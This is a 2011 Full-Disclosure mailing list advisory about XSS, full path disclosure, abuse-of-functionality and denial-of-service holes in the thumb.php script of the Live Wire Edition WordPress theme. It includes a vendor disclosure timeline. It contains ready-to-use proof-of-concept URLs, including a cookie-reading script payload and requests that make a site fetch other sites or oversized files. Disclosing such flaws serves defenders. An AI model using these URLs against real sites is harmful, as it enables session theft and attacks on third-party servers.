[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Vulnerabilities in Live Wire Edition theme for WordPress



Hello list!

I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse
of Functionality and Denial of Service vulnerabilities in Live Wire Edition
theme for WordPress. It's commercial theme for WP by WooThemes.

-------------------------
Affected products:
-------------------------

Vulnerable are Live Wire Edition 2.3.1 and previous versions. XSS is
possible only in old versions of the theme. Recently in version Live Wire
Edition 2.4 most of these vulnerabilities were fixed (but there were still
left many not fixed FPD).

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1

http://site/wp-content/themes/livewire-edition/

And also other 30 php-scripts of the theme in folder /livewire-edition/ and
all subfolders.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

About such AoF and DoS vulnerabilities I wrote in article Using of the sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Beside folder /livewire-edition/, this theme also can be placed in folder
/livewire-package/ (which includes all three themes of Live Wire series).

------------
Timeline:
------------

2011.02.01 - announced at my site.
2011.02.01 - informed developers.
2011.02.04-12 - conversation about fixing holes in all their themes for
WordPress. At first they tried to fix all these holes in themes at their own
sites.
2011.03.28 - developers released version 2.4.
2011.04.08 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4893/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/